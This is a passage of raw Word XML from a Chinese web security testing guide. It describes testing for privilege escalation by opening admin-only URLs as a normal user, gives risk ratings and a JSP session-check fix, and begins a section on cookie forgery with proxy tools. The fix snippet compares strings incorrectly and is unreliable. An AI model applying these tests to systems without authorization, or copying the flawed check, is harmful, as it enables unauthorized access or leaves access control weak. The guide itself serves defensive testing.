        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（高权限用户）</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份登录系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576BBE5C" w14:textId="6FCB10A3" w:rsidR="0049292D" w:rsidRPr="00E10396" w:rsidRDefault="0049292D" w:rsidP="00E10396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到一个只有超管（高权限）才有的功能的链接</w:t>
      </w:r>
      <w:r w:rsidR="00554564" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:"http://localhost/mywebappname/userManage/userList.do" , </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示出所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并复制此链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72A79C" w14:textId="4E0F36D5" w:rsidR="0049292D" w:rsidRPr="00E10396" w:rsidRDefault="0049292D" w:rsidP="00E10396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以普通用户登陆进系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidR="00E75428" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: userManage/userList.do</w:t>
      </w:r>
      <w:r w:rsidR="00E75428" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果可以查看到其所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则就造成了</w:t>
      </w:r>
      <w:r w:rsidR="00E75428" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普通用户的越权访问</w:t>
      </w:r>
      <w:r w:rsidR="00822602" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589503DB" w14:textId="77777777" w:rsidR="0049292D"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检测说明：权限管理测试更多的是进行人工分析，自动化工具无法了解页面的具体应用场景以及逻辑判断过程。因此这里的测试需要首先测试人员理解测试业务系统的逻辑处理流程，并在此基础上进行如下测试。这里有几个测试的参考依据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1CFE2" w14:textId="77777777" w:rsidR="0049292D"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页面是否进行权限判断；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150FD73" w14:textId="77777777" w:rsidR="0049292D"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页面提交的资源标志是否与已登陆的用户身份进行匹配比对；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A822C64" w14:textId="77777777" w:rsidR="00554564"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用户登陆后，服务器端不应再以客户端提交的用户身份信息为依据，而应以会话中保存的已登陆的用户身份信息为准；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682DBDA" w14:textId="2EEDD76A" w:rsidR="00AF5A8B"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必须在服务器端对每个请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行鉴权，而不能仅仅通过客户端的菜单屏蔽或者按钮</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05100FF3" w14:textId="77777777" w:rsidR="001F1CB7" w:rsidRPr="00E10396" w:rsidRDefault="00C24790" w:rsidP="00E10396">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00AF5A8B" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001F1CB7" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前存在着两种越权操作类型：横向越权操作和纵向越权操作。前者指的是攻击者尝试访问与他拥有相同权限的用户的资源；而后者指的是一个低级别攻击者尝试访问高级别用户的资源</w:t>
      </w:r>
      <w:r w:rsidR="001F1CB7" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001F1CB7" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图所示的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539117E" w14:textId="54408B22" w:rsidR="00AF5A8B" w:rsidRPr="00E10396" w:rsidRDefault="001F1CB7" w:rsidP="00E10396">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:snapToGrid/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B26777C" wp14:editId="1DC2AB9D">
            <wp:extent cx="3962400" cy="2057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2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960B356" w14:textId="77777777" w:rsidR="00AF5A8B" w:rsidRPr="00E10396" w:rsidRDefault="00AF5A8B" w:rsidP="00E10396">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCCDCA9" w14:textId="77777777" w:rsidR="00AF5A8B" w:rsidRPr="00E10396" w:rsidRDefault="00AF5A8B" w:rsidP="00E10396">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5295C13E" w14:textId="77777777" w:rsidR="00D243A2" w:rsidRDefault="004F0B71" w:rsidP="00D243A2">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：任意水平或垂直越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B415031" w14:textId="767D4A57" w:rsidR="002D0C0D" w:rsidRDefault="00AF5A8B" w:rsidP="00D243A2">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="002D0C0D" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对用户操作进行权限校验，防止通过修改参数进入未授权</w:t>
      </w:r>
      <w:r w:rsidR="001F58D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面及进行非法操作，建议在服务端对请求的数据和当前用户身份做</w:t>
      </w:r>
      <w:r w:rsidR="002D0C0D" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>校验检查。流程描述：在服务器接收到用户发送的页面访问请求时，根据预设的识别策略，从用户的页面访问请求中提取该用户对应的用户唯一标识信息，同时提取所述页面访问请求对应的应答页面中的表单及该表单中不可修改参数，将所述表单及不可修改参数与所述用户唯一标识信息绑定后记录到参数列表中；检测到用户提交请求页面的表单时，将所述请求页面的表单及不可修改参数与该用户对应的所述参数列表中记录的表单及不可修改参数进行比对，控制该用户的访问。例如：</w:t>
      </w:r>
      <w:r w:rsidR="002D0C0D" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D239E0" w14:paraId="65CA33BE" w14:textId="77777777" w:rsidTr="008D3415">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026C5D"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hint="eastAsia"/>
              </w:rPr>
              <w:t>登陆时将用户名存入</w:t>
            </w:r>
            <w:r w:rsidRPr="00D239E0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">session </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1603F79E"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rPr>
              <w:t>session.setAttribute("username",username);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313F14FB"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hint="eastAsia"/>
              </w:rPr>
              <w:t>在相关页面判断</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C14BDF2"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rPr>
              <w:t>if((String)session.getAttribute("username")!=admin){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2468DBEF" w14:textId="6462F452" w:rsidR="00D239E0" w:rsidRDefault="00D239E0" w:rsidP="00D243A2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D239E0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(response.sendRedirect("XXX.jsp"));</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55B9A468" w14:textId="1C6F2588" w:rsidR="00AF5A8B" w:rsidRDefault="002D0C0D" w:rsidP="00403C43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为自定义的错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF2FDA" w14:textId="1A651C2A" w:rsidR="00EF7E10" w:rsidRPr="00E10396" w:rsidRDefault="00EF7E10" w:rsidP="00E10396">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B10A3B9" w14:textId="4E71C874" w:rsidR="006B2341" w:rsidRPr="00F757E4" w:rsidRDefault="006B2341" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc498434548"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="7854CE71" w14:textId="43CEFAC9"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造攻击指攻击者通过修改</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00A21725" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站为了辨别用户身份而储存在用户本地终端上的数据（通常经过加密）），获得用户未授权信息，进而盗用身份的过程，攻击者利用此漏洞可打开新账号或获取用户已存在账号的访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA92589" w14:textId="55B5ED49"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等代理软件或浏览器</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改插件，篡改</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E8A06" w14:textId="77777777" w:rsidR="008B0F20" w:rsidRPr="007824EA" w:rsidRDefault="00C24790" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="006B2341" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="008B0F20" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中通常使用以下几种方式来确定一个会话：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E1D7C1" w14:textId="77777777" w:rsidR="008B0F20" w:rsidRPr="007824EA" w:rsidRDefault="008B0F20" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>唯一标识</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781EDD34" w14:textId="77777777" w:rsidR="008B0F20" w:rsidRPr="007824EA" w:rsidRDefault="008B0F20" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531908C7" w14:textId="77777777" w:rsidR="008B0F20" w:rsidRPr="007824EA" w:rsidRDefault="008B0F20" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8BFA7" w14:textId="7D95715D" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="008B0F20" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
